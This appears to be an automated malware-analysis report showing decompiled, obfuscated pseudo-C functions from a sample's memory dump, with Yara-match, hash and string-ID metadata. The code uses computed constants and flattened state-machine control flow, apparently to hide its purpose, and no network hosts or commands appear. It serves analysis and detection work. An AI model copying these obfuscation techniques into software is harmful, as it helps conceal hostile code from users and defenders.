                                          				intOrPtr _t562;
                                          				intOrPtr _t572;
                                          				void* _t574;
                                          				signed int _t577;
                                          				signed int _t578;
                                          				signed int _t579;
                                          				signed int _t580;
                                          				signed int _t581;
                                          				signed int _t582;
                                          				signed int _t583;
                                          				signed int _t584;
                                          				signed int _t585;
                                          				signed int _t586;
                                          				signed int _t587;
                                          				signed int _t588;
                                          				signed int _t589;
                                          				signed int _t590;
                                          				intOrPtr _t591;
                                          				intOrPtr _t592;
                                          				void* _t597;
                                          				intOrPtr _t599;
                                          				intOrPtr _t635;
                                          				intOrPtr _t639;
                                          				void* _t641;
                                          				signed int* _t653;
                                          				void* _t656;
                                          
                                          				_t575 = _a4;
                                          				_push(_a4);
                                          				_push(__edx);
                                          				E006C602B(_t496);
                                          				_v12 = 0x36bdff;
                                          				_t653 =  &(( &_v228)[3]);
                                          				_v8 = 0x3ff2a1;
                                          				_t639 = 0;
                                          				_v4 = 0;
                                          				_v132 = 0xebdb;
                                          				_t641 = 0x15e50797;
                                          				_t577 = 0x54;
                                          				_v132 = _v132 / _t577;
                                          				_v132 = _v132 | 0x22f60655;
                                          				_v132 = _v132 ^ 0x22f660d1;
                                          				_v120 = 0xef02;
                                          				_v120 = _v120 + 0xffff4354;
                                          				_v120 = _v120 + 0xfbd6;
                                          				_v120 = _v120 ^ 0x0001ae28;
                                          				_v52 = 0x7417;
                                          				_v52 = _v52 + 0x1179;
                                          				_v52 = _v52 ^ 0x00000590;
                                          				_v48 = 0x8f30;
                                          				_v48 = _v48 >> 0xf;
                                          				_v64 = 0xc7cd;
                                          				_v64 = _v64 << 0xc;
                                          				_v64 = _v64 ^ 0x0c7cd040;
                                          				_v140 = 0xc967;
                                          				_v140 = _v140 << 0xb;
                                          				_v140 = _v140 | 0xe06bf9c9;
                                          				_v140 = _v140 ^ 0x166bf9c9;
                                          				_v196 = 0x461e;
                                          				_v196 = _v196 | 0x6b692bd6;
                                          				_v196 = _v196 + 0xc0cf;
                                          				_v196 = _v196 + 0xffff0de4;
                                          				_v196 = _v196 ^ 0x6b6977c5;
                                          				_v180 = 0xfff7;
                                          				_t578 = 0x59;
                                          				_v180 = _v180 / _t578;
                                          				_t579 = 0x4d;
                                          				_v180 = _v180 * 0x18;
                                          				_v180 = _v180 | 0x58a6a9da;
                                          				_v180 = _v180 ^ 0x58a6c249;
                                          				_v128 = 0x9f16;
                                          				_v128 = _v128 ^ 0xdade8ffa;
                                          				_v128 = _v128 ^ 0x4c90ffe3;
                                          				_v128 = _v128 ^ 0x964ece00;
                                          				_v92 = 0xcecd;
                                          				_v92 = _v92 + 0x8237;
                                          				_v92 = _v92 / _t579;
                                          				_v92 = _v92 ^ 0x00006f99;
                                          				_v100 = 0x1088;
                                          				_v100 = _v100 << 8;
                                          				_v100 = _v100 << 3;
                                          				_v100 = _v100 ^ 0x0084674e;
                                          				_v108 = 0x5533;
                                          				_v108 = _v108 >> 9;
                                          				_v108 = _v108 | 0xd8fb4233;
                                          				_v108 = _v108 ^ 0xd8fb1bcd;
                                          				_v208 = 0xcae;
                                          				_v208 = _v208 / _t579;
                                          				_t580 = 0x13;
                                          				_v208 = _v208 / _t580;
                                          				_v208 = _v208 >> 0xa;
                                          				_v208 = _v208 ^ 0x00001a16;
                                          				_v216 = 0x40e3;
                                          				_v216 = _v216 | 0x810267c5;
                                          				_v216 = _v216 << 1;
                                          				_v216 = _v216 << 3;
                                          				_v216 = _v216 ^ 0x10267eee;
                                          				_v28 = 0xb673;
                                          				_t581 = 0x3e;
                                          				_v28 = _v28 / _t581;
                                          				_v28 = _v28 ^ 0x0000683f;
                                          				_v40 = 0x9279;
                                          				_v40 = _v40 + 0xffffeab6;
                                          				_v40 = _v40 ^ 0x000054a5;
                                          				_v204 = 0x1c40;
                                          				_v204 = _v204 + 0xffff1f7d;
                                          				_t582 = 0x50;
                                          				_v204 = _v204 / _t582;
                                          				_v204 = _v204 ^ 0x72bb6b9a;
                                          				_v204 = _v204 ^ 0x71887e03;
                                          				_v112 = 0xb897;
                                          				_v112 = _v112 + 0xffffdcba;
                                          				_v112 = _v112 | 0x14aad9bd;
                                          				_v112 = _v112 ^ 0x14aaad8a;
                                          				_v172 = 0xd85f;
                                          				_v172 = _v172 + 0xffff9181;
                                          				_t583 = 0x36;
                                          				_v172 = _v172 * 0x2e;
                                          				_v172 = _v172 + 0x3c74;
                                          				_v172 = _v172 ^ 0x00135ecd;
                                          				_v212 = 0x19f7;
                                          				_v212 = _v212 + 0xffff95e1;
                                          				_v212 = _v212 | 0x04fc32b0;
                                          				_v212 = _v212 << 0xa;
                                          				_v212 = _v212 ^ 0xfeffe01a;
                                          				_v36 = 0x7d37;
                                          				_v36 = _v36 | 0x20ef5b1a;
                                          				_v36 = _v36 ^ 0x20ef0402;
                                          				_v116 = 0xd595;
                                          				_v116 = _v116 / _t583;
                                          				_v116 = _v116 + 0xffffe49c;
                                          				_v116 = _v116 ^ 0xffffa94a;
                                          				_v160 = 0x5e14;
                                          				_v160 = _v160 | 0xdf0c29a2;
                                          				_v160 = _v160 ^ 0xe579e09e;
                                          				_v160 = _v160 + 0xffffde5a;
                                          				_v160 = _v160 ^ 0x3a753154;
                                          				_v68 = 0x52ff;
                                          				_v68 = _v68 >> 8;
                                          				_v68 = _v68 ^ 0x000014f4;
                                          				_v76 = 0x7879;
                                          				_t584 = 0x73;
                                          				_v76 = _v76 / _t584;
                                          				_v76 = _v76 ^ 0x0000054d;
                                          				_v72 = 0x594e;
                                          				_v72 = _v72 ^ 0x61e5003d;
                                          				_v72 = _v72 ^ 0x61e57443;
                                          				_v156 = 0xdc41;
                                          				_v156 = _v156 << 6;
                                          				_v156 = _v156 << 0x10;
                                          				_v156 = _v156 ^ 0x10402e5f;
                                          				_v152 = 0x2cab;
                                          				_v152 = _v152 << 0xc;
                                          				_v152 = _v152 ^ 0xa6d63634;
                                          				_v152 = _v152 ^ 0xa41cdbd3;
                                          				_v24 = 0xfca2;
                                          				_v24 = _v24 >> 0xd;
                                          				_v24 = _v24 ^ 0x000010c7;
                                          				_v96 = 0xe6c1;
                                          				_v96 = _v96 << 0xd;
                                          				_v96 = _v96 + 0xc19f;
                                          				_v96 = _v96 ^ 0x1cd8953a;
                                          				_v224 = 0x49a1;
                                          				_v224 = _v224 ^ 0xfe0521c0;
                                          				_v224 = _v224 + 0x1e0d;
                                          				_v224 = _v224 | 0x46707e16;
                                          				_v224 = _v224 ^ 0xfe759897;
                                          				_v228 = 0x2882;
                                          				_v228 = _v228 << 0x10;
                                          				_v228 = _v228 ^ 0x2e28bbbf;
                                          				_v228 = _v228 | 0x3bec92e5;
                                          				_v228 = _v228 ^ 0x3fee891d;
                                          				_v136 = 0x5ad;
                                          				_v136 = _v136 ^ 0x3d33a635;
                                          				_v136 = _v136 + 0xffff9ac4;
                                          				_v136 = _v136 ^ 0x3d335448;
                                          				_v104 = 0x3c69;
                                          				_v104 = _v104 + 0xf144;
                                          				_t585 = 0x19;
                                          				_v104 = _v104 * 0x1e;
                                          				_v104 = _v104 ^ 0x0023546a;
                                          				_v188 = 0xf300;
                                          				_v188 = _v188 / _t585;
                                          				_v188 = _v188 + 0xffffad26;
                                          				_v188 = _v188 | 0x8105dcb8;
                                          				_v188 = _v188 ^ 0xffffe238;
                                          				_v144 = 0x45c8;
                                          				_v144 = _v144 >> 0xe;
                                          				_v144 = _v144 + 0x45b6;
                                          				_v144 = _v144 ^ 0x000072cd;
                                          				_v192 = 0xd236;
                                          				_v192 = _v192 >> 0x10;
                                          				_t586 = 0x69;
                                          				_v192 = _v192 / _t586;
                                          				_v192 = _v192 ^ 0x176600d6;
                                          				_v192 = _v192 ^ 0x17663ad7;
                                          				_v200 = 0x1b90;
                                          				_v200 = _v200 >> 0xe;
                                          				_v200 = _v200 | 0x00032953;
                                          				_t587 = 0xe;
                                          				_v200 = _v200 * 0x71;
                                          				_v200 = _v200 ^ 0x016540c6;
                                          				_v32 = 0xa5b;
                                          				_v32 = _v32 / _t587;
                                          				_v32 = _v32 ^ 0x00002bda;
                                          				_v56 = 0xbe4e;
                                          				_v56 = _v56 + 0xffffe059;
                                          				_v56 = _v56 ^ 0x0000eaa3;
                                          				_v220 = 0x4321;
                                          				_v220 = _v220 ^ 0x3fa1daa1;
                                          				_v220 = _v220 + 0xffff309f;
                                          				_t588 = 0x24;
                                          				_v220 = _v220 / _t588;
                                          				_v220 = _v220 ^ 0x01c46047;
                                          				_v164 = 0x3944;
                                          				_v164 = _v164 + 0xffff1fd9;
                                          				_t589 = 0x2b;
                                          				_v164 = _v164 * 0x57;
                                          				_v164 = _v164 << 4;
                                          				_v164 = _v164 ^ 0xfc749d64;
                                          				_v148 = 0x7755;
                                          				_v148 = _v148 ^ 0x244775ea;
                                          				_v148 = _v148 | 0xcd3e82a6;
                                          				_v148 = _v148 ^ 0xed7f8152;
                                          				_v88 = 0x40ad;
                                          				_v88 = _v88 >> 0xf;
                                          				_v88 = _v88 ^ 0x000030bd;
                                          				_v80 = 0x9327;
                                          				_v80 = _v80 * 0x70;
                                          				_v80 = _v80 ^ 0x00406c8d;
                                          				_v176 = 0x8ba8;
                                          				_v176 = _v176 + 0x5748;
                                          				_v176 = _v176 + 0xffffe08a;
                                          				_v176 = _v176 + 0xffffcf91;
                                          				_v176 = _v176 ^ 0x0000bf1e;
                                          				_v124 = 0xe985;
                                          				_v124 = _v124 ^ 0x9cf6d459;
                                          				_v124 = _v124 + 0xffffb832;
                                          				_v124 = _v124 ^ 0x9cf5d440;
                                          				_v184 = 0xee13;
                                          				_v184 = _v184 / _t589;
                                          				_v184 = _v184 ^ 0x973ecc13;
                                          				_t590 = 0x6a;
                                          				_v184 = _v184 / _t590;
                                          				_v184 = _v184 ^ 0x016d24ef;
                                          				_v84 = 0xbcf1;
                                          				_v84 = _v84 ^ 0x64b03ea8;
                                          				_v84 = _v84 ^ 0x64b0e2a8;
                                          				_v60 = 0x8a4f;
                                          				_v60 = _v60 | 0x8c15d5a4;
                                          				_v60 = _v60 ^ 0x8c14dfef;
                                          				_v44 = 0x30ef;
                                          				_v44 = _v44 + 0xffffe2a4;
                                          				_v44 = _v44 ^ 0x00001380;
                                          				_v168 = 0xbe5e;
                                          				_v168 = _v168 << 0x10;
                                          				_v168 = _v168 | 0x5aa68a8d;
                                          				_v168 = _v168 + 0xffff34cf;
                                          				_v168 = _v168 ^ 0xfefdbf5d;
                                          				goto L1;
                                          				do {
                                          					while(1) {
                                          						L1:
                                          						_t656 = _t641 - 0x2e2ba50c;
                                          						if(_t656 > 0) {
                                          							break;
                                          						}
                                          						if(_t656 == 0) {
                                          							_push(_t590);
                                          							_push(_t590);
                                          							_t591 =  *0x6dca20; // 0x0
                                          							_t590 = _t591 + 0x18;
                                          							_t551 = E006CC46E(_t590, _v208, _v216, _v28, _v140 | _v64, _t590, _v40);
                                          							_t653 =  &(_t653[7]);
                                          							asm("sbb esi, esi");
                                          							_t641 = ( ~_t551 & 0xf61d5154) + 0x3b32afa9;
                                          							continue;
                                          						} else {
                                          							if(_t641 == 0xfdb1f24) {
                                          								_t552 =  *0x6dca20; // 0x0
                                          								_t554 =  *0x6dca20; // 0x0
                                          								_t555 = E006CF292(_v72, _v156,  *((intOrPtr*)(_t554 + 0x18)), _v152, _v20, _v24, _t590, _v16, _t552 + 0x24, _t590, _v96);
                                          								_t590 = _v224;
                                          								asm("sbb esi, esi");
                                          								_t641 = ( ~_t555 & 0x1a4c73ed) + 0x1af0d9d8;
                                          								E006D9465(_t590, _v20, _v228);
                                          								_t653 =  &(_t653[0xa]);
                                          								goto L27;
                                          							} else {
                                          								if(_t641 == 0x15e50797) {
                                          									_push(_t590);
                                          									_t597 = 0x34;
                                          									_t562 = E006C8736(_t597);
                                          									 *0x6dca20 = _t562;
                                          									_t590 = _t590;
                                          									if(_t562 != 0) {
                                          										_t641 = 0x2e2ba50c;
                                          										continue;
                                          									}
                                          								} else {
                                          									if(_t641 == 0x1af0d9d8) {
                                          										_t599 =  *0x6dca20; // 0x0
                                          										_t590 =  *(_t599 + 0x18);
                                          										E006C87FA(_t590);
                                          										_t653 = _t653 - 0x10 + 0x10;
                                          										_t641 = 0x3b32afa9;
                                          										continue;
                                          									} else {
                                          										if(_t641 == 0x1f84fef1) {
                                          											_t572 =  *0x6dca20; // 0x0
                                          											_push(_t590);
                                          											_push(_t590);
                                          											E006DAB25(_t590,  *((intOrPtr*)(_t572 + 0x24)));
                                          											_t653 =  &(_t653[3]);
                                          											_t641 = 0x1af0d9d8;
                                          											continue;
                                          										} else {
                                          											if(_t641 != 0x2135b5bc) {
                                          												goto L27;
                                          											} else {
                                          												_t635 =  *0x6dca20; // 0x0
                                          												_t437 = _t635 + 0x2c; // 0x2c
                                          												_t590 = _t437;
                                          												_t574 = E006D1A1F(_t590,  *((intOrPtr*)(_t635 + 0x18)), _v220, _v120, _v164, _v148, _t590, _v88, _t590, _v80);
                                          												_t653 =  &(_t653[8]);
                                          												if(_t574 != 0) {
                                          													_t639 = 1;
                                          												} else {
                                          													_t641 = 0x3151f296;
                                          													continue;
                                          												}
                                          											}
                                          										}
                                          									}
                                          								}
                                          							}
                                          						}
                                          						L21:
                                          						return _t639;
                                          					}
                                          					if(_t641 == 0x315000fd) {
                                          						_t590 = _v36;
                                          						_t539 = E006C75AE(_t590,  *_t575, _t590,  &_v20, _v44, _v116,  *((intOrPtr*)(_t575 + 4)),  &_v16, _v160, _v52, _v168 | _v60, _v68, _v76);
                                          						_t653 =  &(_t653[0xb]);
                                          						if(_t539 == 0) {
                                          							_t641 = 0x1af0d9d8;
                                          							goto L27;
                                          						} else {
                                          							_t641 = 0xfdb1f24;
                                          							goto L1;
                                          						}
                                          					} else {
                                          						if(_t641 == 0x3151f296) {
                                          							_t544 =  *0x6dca20; // 0x0
                                          							_push(_t590);
                                          							_push(_t590);
                                          							E006DAB25(_t590,  *((intOrPtr*)(_t544 + 0x10)));
                                          							_t653 =  &(_t653[3]);
                                          							_t641 = 0x1f84fef1;
                                          							goto L1;
                                          						} else {
                                          							if(_t641 == 0x353d4dc5) {
                                          								_t546 =  *0x6dca20; // 0x0
                                          								_t592 =  *0x6dca20; // 0x0
                                          								_t590 =  *(_t592 + 0x18);
                                          								_t548 = E006C66C9(_t590, _v48, _v132, _t546 + 0x10, _v192, _v200, _v32, _v56);
                                          								_t653 =  &(_t653[6]);
                                          								asm("sbb esi, esi");
                                          								_t641 = ( ~_t548 & 0x01b0b6cb) + 0x1f84fef1;
                                          								goto L1;
                                          							} else {
                                          								if(_t641 != 0x3b32afa9) {
                                          									goto L27;
                                          								} else {
                                          									E006CF536(_v92, _v100, _v108,  *0x6dca20);
                                          								}
                                          							}
                                          						}
                                          					}
                                          					goto L21;
                                          					L27:
                                          				} while (_t641 != 0x5edb69a);
                                          				goto L21;
                                          			}


                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.2095095758.00000000006C1000.00000020.00000001.sdmp, Offset: 006C0000, based on PE: true
                                          • Associated: 00000007.00000002.2095092922.00000000006C0000.00000004.00000001.sdmp
                                          • Associated: 00000007.00000002.2095106870.00000000006DC000.00000004.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID: !C$3U$?h$Cta$D9$HT3=$HW$T1u:$[$i<$jT#$t<$0$@$uG$
                                          • API String ID: 0-3043381779
                                          • Opcode ID: 13ccf43e6d17586f164136a3a75e56a3f80daf37307104dba3b86866f3a814e6
                                          • Instruction ID: 5991ddf3aa7c3794dd7a9e0ca9a5de631368e86863a6bfffa4d5a8925b938e9c
                                          • Opcode Fuzzy Hash: 13ccf43e6d17586f164136a3a75e56a3f80daf37307104dba3b86866f3a814e6
                                          • Instruction Fuzzy Hash: 764223715093819FE378CF25C98AB9BBBE2FB84314F10891DE599962A0D7B58849CF43
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 96%
                                          			E006D511B(intOrPtr* __ecx, intOrPtr __edx, intOrPtr* _a4) {
                                          				char _v64;
                                          				char _v128;
                                          				signed int _v132;
                                          				intOrPtr _v136;
                                          				intOrPtr _v140;
                                          				intOrPtr* _v144;
                                          				char _v148;
                                          				signed int _v152;
                                          				signed int _v156;
                                          				signed int _v160;
                                          				signed int _v164;
                                          				signed int _v168;
                                          				unsigned int _v172;
                                          				signed int _v176;
                                          				signed int _v180;
                                          				signed int _v184;
                                          				signed int _v188;
                                          				signed int _v192;
                                          				signed int _v196;
                                          				signed int _v200;
                                          				signed int _v204;
                                          				signed int _v208;
                                          				signed int _v212;
                                          				signed int _v216;
                                          				signed int _v220;
                                          				signed int _v224;
                                          				signed int _v228;
                                          				signed int _v232;
                                          				signed int _v236;
                                          				signed int _v240;
                                          				signed int _v244;
                                          				signed int _v248;
                                          				signed int _v252;
                                          				signed int _v256;
                                          				signed int _v260;
                                          				signed int _v264;
                                          				signed int _v268;
                                          				signed int _v272;
                                          				signed int _v276;
                                          				signed int _v280;
                                          				signed int _v284;
                                          				signed int _v288;
                                          				signed int _v292;
                                          				signed int _v296;
                                          				signed int _v300;
                                          				signed int _v304;
                                          				unsigned int _v308;
                                          				signed int _v312;
                                          				signed int _v316;
                                          				signed int _t462;
                                          				intOrPtr* _t466;
                                          				signed int _t513;
                                          				signed int _t514;
                                          				signed int _t515;
                                          				signed int _t516;
                                          				signed int _t517;
                                          				signed int _t518;
                                          				signed int _t519;
                                          				signed int _t520;
                                          				intOrPtr _t521;
                                          				void* _t522;
                                          				void* _t525;
                                          				void* _t528;
                                          				intOrPtr* _t531;
                                          				signed int* _t532;
                                          
                                          				_t466 = __ecx;
                                          				_t532 =  &_v316;
                                          				_v140 = __edx;
                                          				_v144 = __ecx;
                                          				_v132 = _v132 & 0x00000000;
                                          				_v136 = 0x75b778;
                                          				_v308 = 0x9968;
                                          				_v308 = _v308 | 0x0cfdc455;
                                          				_v308 = _v308 + 0xdd4c;
                                          				_v308 = _v308 >> 3;
                                          				_v308 = _v308 ^ 0x019fad6f;
                                          				_v172 = 0xa03a;
                                          				_v172 = _v172 >> 8;
                                          				_v172 = _v172 ^ 0x00000391;
                                          				_v228 = 0x2930;
                                          				_v228 = _v228 << 0xc;
                                          				_v228 = _v228 ^ 0x02930f5f;
                                          				_v220 = 0x5883;
                                          				_v220 = _v220 + 0xffff1c36;
                                          				_v220 = _v220 ^ 0xffff6a37;
                                          				_v288 = 0x122f;
                                          				_v288 = _v288 << 0xf;
                                          				_v288 = _v288 + 0xd44b;
                                          				_v288 = _v288 << 0xa;
                                          				_v288 = _v288 ^ 0x6151757c;
                                          				_v260 = 0xc525;
                                          				_v260 = _v260 << 0xa;
                                          				_t522 = 0x1b8692db;
                                          				_t513 = 0x61;
                                          				_v260 = _v260 / _t513;
                                          				_v260 = _v260 ^ 0x00083ddd;
                                          				_v164 = 0x49a7;
                                          				_t514 = 0x7b;
                                          				_t462 = 0x17;
                                          				_v164 = _v164 * 0x76;
                                          				_v164 = _v164 ^ 0x002193f4;
                                          				_v300 = 0x59a2;
                                          				_v300 = _v300 ^ 0x3b27ac73;
                                          				_v300 = _v300 + 0xffff6ec5;
                                          				_v300 = _v300 + 0xffffb5fd;
                                          				_v300 = _v300 ^ 0x3b271e50;
                                          				_v252 = 0xb9af;
                                          				_v252 = _v252 >> 8;
                                          				_v252 = _v252 + 0xffffa108;
                                          				_v252 = _v252 ^ 0xfffffedf;
                                          				_v196 = 0x7b72;
                                          				_v196 = _v196 << 2;
                                          				_v196 = _v196 ^ 0x0001e8b2;
                                          				_v272 = 0x250d;
                                          				_v272 = _v272 * 0x16;
                                          				_v272 = _v272 >> 3;
                                          				_v272 = _v272 / _t514;
                                          				_v272 = _v272 ^ 0x0000021c;
                                          				_v156 = 0x4ea8;
                                          				_v156 = _v156 + 0xffff8c10;
                                          				_v156 = _v156 ^ 0xffffc687;
                                          				_v292 = 0x9a7d;
                                          				_v292 = _v292 << 1;
                                          				_v292 = _v292 / _t462;
                                          				_v292 = _v292 | 0x2e5edf0a;
                                          				_v292 = _v292 ^ 0x2e5e89f7;
                                          				_v236 = 0x69d3;
                                          				_t515 = 0x5a;
                                          				_v236 = _v236 / _t515;
                                          				_v236 = _v236 >> 0xf;
                                          				_v236 = _v236 ^ 0x000046bd;
                                          				_v268 = 0x8cb9;
                                          				_v268 = _v268 + 0xffff2c59;
                                          				_v268 = _v268 << 4;
                                          				_v268 = _v268 << 2;
                                          				_v268 = _v268 ^ 0xffee6fc7;
                                          				_v284 = 0x8a1;
                                          				_v284 = _v284 ^ 0x358a3729;
                                          				_v284 = _v284 << 4;
                                          				_v284 = _v284 + 0xde3b;
                                          				_v284 = _v284 ^ 0x58a4aa69;
                                          				_v264 = 0x360c;
                                          				_v264 = _v264 ^ 0xc2d2005c;
                                          				_v264 = _v264 << 6;
                                          				_t516 = 0x32;
                                          				_v264 = _v264 * 0x5c;
                                          				_v264 = _v264 ^ 0xe2e17670;
                                          				_v180 = 0x8be;
                                          				_v180 = _v180 | 0xafaf70c7;
                                          				_v180 = _v180 ^ 0xafaf5d0a;
                                          				_v168 = 0x59fe;
                                          				_v168 = _v168 << 0xd;
                                          				_v168 = _v168 ^ 0x0b3f82ad;
                                          				_v188 = 0x197e;
                                          				_v188 = _v188 << 4;
                                          				_v188 = _v188 ^ 0x0001c80c;
                                          				_v256 = 0x542a;
                                          				_v256 = _v256 + 0x92cc;
                                          				_v256 = _v256 | 0xa238a407;
                                          				_v256 = _v256 ^ 0xa2389846;
                                          				_v224 = 0x7627;
                                          				_v224 = _v224 + 0xdff4;
                                          				_v224 = _v224 ^ 0x000122df;
                                          				_v316 = 0x3ece;
                                          				_v316 = _v316 * 0x74;
                                          				_v316 = _v316 >> 8;
                                          				_v316 = _v316 | 0xc6a89cdb;
                                          				_v316 = _v316 ^ 0xc6a8f635;
                                          				_v244 = 0x10d9;
                                          				_v244 = _v244 | 0xf517e732;
                                          				_v244 = _v244 + 0x5e6f;
                                          				_v244 = _v244 ^ 0xf518070f;
                                          				_v160 = 0xb68b;
                                          				_v160 = _v160 >> 7;
                                          				_v160 = _v160 ^ 0x00003a74;
                                          				_v276 = 0x3579;
                                          				_v276 = _v276 | 0x431a7672;
                                          				_v276 = _v276 << 2;
                                          				_v276 = _v276 / _t516;
                                          				_v276 = _v276 ^ 0x003ff326;
                                          				_v216 = 0xcfb7;
                                          				_t517 = 0x63;
                                          				_v216 = _v216 / _t517;
                                          				_v216 = _v216 ^ 0x00003917;
                                          				_v312 = 0xd3b7;
                                          				_v312 = _v312 ^ 0x43b1e200;
                                          				_v312 = _v312 << 8;
                                          				_t518 = 0x70;
                                          				_v312 = _v312 / _t518;
                                          				_v312 = _v312 ^ 0x01952af0;
                                          				_v248 = 0xe683;
                                          				_v248 = _v248 | 0xeb182d0f;
                                          				_v248 = _v248 + 0xcf0c;
                                          				_v248 = _v248 ^ 0xeb19e4ec;
                                          				_v204 = 0xada2;
                                          				_v204 = _v204 >> 0x10;
                                          				_v204 = _v204 ^ 0x000009df;
                                          				_v152 = 0xb32a;
                                          				_v152 = _v152 + 0xffff4f9d;
                                          				_v152 = _v152 ^ 0x00004085;
                                          				_v212 = 0xbe4c;
                                          				_t531 = _a4;
                                          				_v212 = _v212 * 5;
                                          				_v212 = _v212 ^ 0x00039e07;
                                          				_v280 = 0xc7f7;
                                          				_v280 = _v280 | 0xad7c9e6f;
                                          				_v280 = _v280 * 0x1c;
                                          				_v280 = _v280 | 0xde3ec68b;
                                          				_v280 = _v280 ^ 0xffbea491;
                                          				_v240 = 0x8de7;
                                          				_v240 = _v240 * 0x45;
                                          				_t463 = _v140;
                                          				_v240 = _v240 / _t462;
                                          				_v240 = _v240 ^ 0x00019f2b;
                                          				_v304 = 0x16f;
                                          				_v304 = _v304 | 0xdf403998;
                                          				_v304 = _v304 ^ 0x6a41af55;
                                          				_v304 = _v304 | 0x5f7c1de9;
                                          				_v304 = _v304 ^ 0xff7dd65d;
                                          				_v208 = 0xa25a;
                                          				_v208 = _v208 / _t518;
                                          				_v208 = _v208 ^ 0x00007fd0;
                                          				_v184 = 0x444f;
                                          				_t519 = 0x26;
                                          				_v184 = _v184 * 0x7d;
                                          				_v184 = _v184 ^ 0x002171af;
                                          				_v192 = 0x6191;
                                          				_v192 = _v192 << 6;
                                          				_v192 = _v192 ^ 0x00185c0b;
                                          				_v200 = 0x9864;
                                          				_v200 = _v200 / _t519;
                                          				_v200 = _v200 ^ 0x0000693d;
                                          				_v232 = 0xae1;
                                          				_v232 = _v232 ^ 0x7986b26b;
                                          				_t520 = 0x49;
                                          				_t521 = _v140;
                                          				_v232 = _v232 / _t520;
                                          				_v232 = _v232 ^ 0x01aa59fa;
                                          				_v176 = 0xf7eb;
                                          				_v176 = _v176 * 0x67;
                                          				_v176 = _v176 ^ 0x0063e620;
                                          				_v296 = 0x2b09;
                                          				_v296 = _v296 + 0xffffdaa4;
                                          				_v296 = _v296 | 0x1659e70b;
                                          				_v296 = _v296 ^ 0x3abae7e6;
                                          				_v296 = _v296 ^ 0x2ce32170;
                                          				while(_t522 != 0xa551406) {
                                          					if(_t522 == 0x10f51287) {
                                          						E006D2674(_v204, _v152,  *((intOrPtr*)(_t466 + 4)), _t521, _v212, _v280,  *_t466);
                                          						_t466 = _v144;
                                          						_t532 =  &(_t532[5]);
                                          						_t522 = 0x3013e9c6;
                                          						_t521 = _t521 +  *((intOrPtr*)(_t466 + 4));
                                          						continue;
                                          					}
                                          					if(_t522 == 0x14284095) {
                                          						_t522 = 0x28f75045;
                                          						_a4 =  *((intOrPtr*)(_t466 + 4)) + 0x1000;
                                          						continue;
                                          					}
                                          					if(_t522 == 0x1b8692db) {
                                          						_v148 = E006D8C8F(_t466);
                                          						_t522 = 0x14284095;
                                          						L10:
                                          						_t466 = _v144;
                                          						continue;
                                          					}
                                          					if(_t522 == 0x28f75045) {
                                          						_push(_t466);
                                          						_push(_t466);
                                          						_t521 = E006C8736(_a4);
                                          						 *_t531 = _t521;
                                          						__eflags = _t521;
                                          						if(_t521 == 0) {
                                          							L16:
                                          							__eflags = 0;
                                          							return 0;
                                          						}
                                          						_t522 = 0xa551406;
                                          						_t463 = _a4 + _t521;
                                          						__eflags = _a4 + _t521;
                                          						goto L10;
                                          					}
                                          					_t541 = _t522 - 0x3013e9c6;
                                          					if(_t522 != 0x3013e9c6) {
                                          						L15:
                                          						__eflags = _t522 - 0x28249ddd;
                                          						if(__eflags != 0) {
                                          							continue;
                                          						}
                                          						goto L16;
                                          					}
                                          					_push(0x6dc7a0);
                                          					_push(_v208);
                                          					E006C7F4B(_t521, E006D878F(_v240, _v304, _t541), _v184, _v140, _v192, _v200);
                                          					E006D2025(_v232, _t457, _v176, _v296);
                                          					return 1;
                                          				}
                                          				_t525 = (E006CEDCF(_v260, _v164,  &_v148, _v300) & 0x0000000f) + 4;
                                          				E006CB605( &_v64,  &_v148, _t525, _v252, _v196, _v272);
                                          				_t373 =  &_v292; // 0xe2e17670
                                          				 *((char*)(_t532 + _t525 + 0x130)) = 0;
                                          				_t528 = (E006CEDCF(_v156,  *_t373,  &_v148, _v236) & 0x0000000f) + 4;
                                          				E006CB605( &_v128,  &_v148, _t528, _v268, _v284, _v264);
                                          				_push(0x6dc710);
                                          				_push(_v188);
                                          				 *((char*)(_t532 + _t528 + 0x10c)) = 0;
                                          				_t521 = _t521 + E006C11C1( &_v64, _v224, _v316,  &_v128, _v140, _t521, _v244, _v160, _t463 - _t521, E006D878F(_v180, _v168, __eflags), _v276);
                                          				__eflags = _t521;
                                          				E006D2025(_v216, _t440, _v312, _v248);
                                          				_t466 = _v144;
                                          				_t532 =  &(_t532[0x1c]);
                                          				_t522 = 0x10f51287;
                                          				goto L15;
                                          			}

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.2095095758.00000000006C1000.00000020.00000001.sdmp, Offset: 006C0000, based on PE: true
                                          • Associated: 00000007.00000002.2095092922.00000000006C0000.00000004.00000001.sdmp
                                          • Associated: 00000007.00000002.2095106870.00000000006DC000.00000004.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID: %$ c$'v$*T$0)$=i$OD$o^$p!,$pv$r{$t:$y5$|uQa
                                          • API String ID: 0-2620103065
                                          • Opcode ID: 0ee8927850cc808b42524e48752f73e40c4e79944385f14c25b9fd2d76d3574d
                                          • Instruction ID: ccd1d4e970c0f5638877c6b3d7cdae929ad95f5652e6574f30b83ad1a6d31058
                                          • Opcode Fuzzy Hash: 0ee8927850cc808b42524e48752f73e40c4e79944385f14c25b9fd2d76d3574d
                                          • Instruction Fuzzy Hash: 57222371508380DFE364CF25C58AA8BFBE2BBC4748F108A1DE5D996261C7B58949CF43
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 92%
                                          			E006C4A35(intOrPtr __ecx, signed int __edx) {
                                          				char _v524;
                                          				char _v1044;
                                          				char _v1564;
                                          				intOrPtr _v1568;
                                          				intOrPtr _v1572;
                                          				char _v1576;
                                          				intOrPtr _v1580;
                                          				char _v1584;
                                          				intOrPtr _v1588;
                                          				signed int _v1592;
                                          				signed int _v1596;
                                          				signed int _v1600;
                                          				signed int _v1604;
                                          				signed int _v1608;
                                          				signed int _v1612;
                                          				signed int _v1616;
                                          				signed int _v1620;
                                          				signed int _v1624;
                                          				signed int _v1628;
                                          				signed int _v1632;
                                          				unsigned int _v1636;
                                          				signed int _v1640;
                                          				signed int _v1644;
                                          				signed int _v1648;
                                          				signed int _v1652;
                                          				signed int _v1656;
                                          				signed int _v1660;
                                          				signed int _v1664;
                                          				signed int _v1668;
                                          				signed int _v1672;
                                          				signed int _v1676;
                                          				signed int _v1680;
                                          				signed int _v1684;
                                          				signed int _v1688;
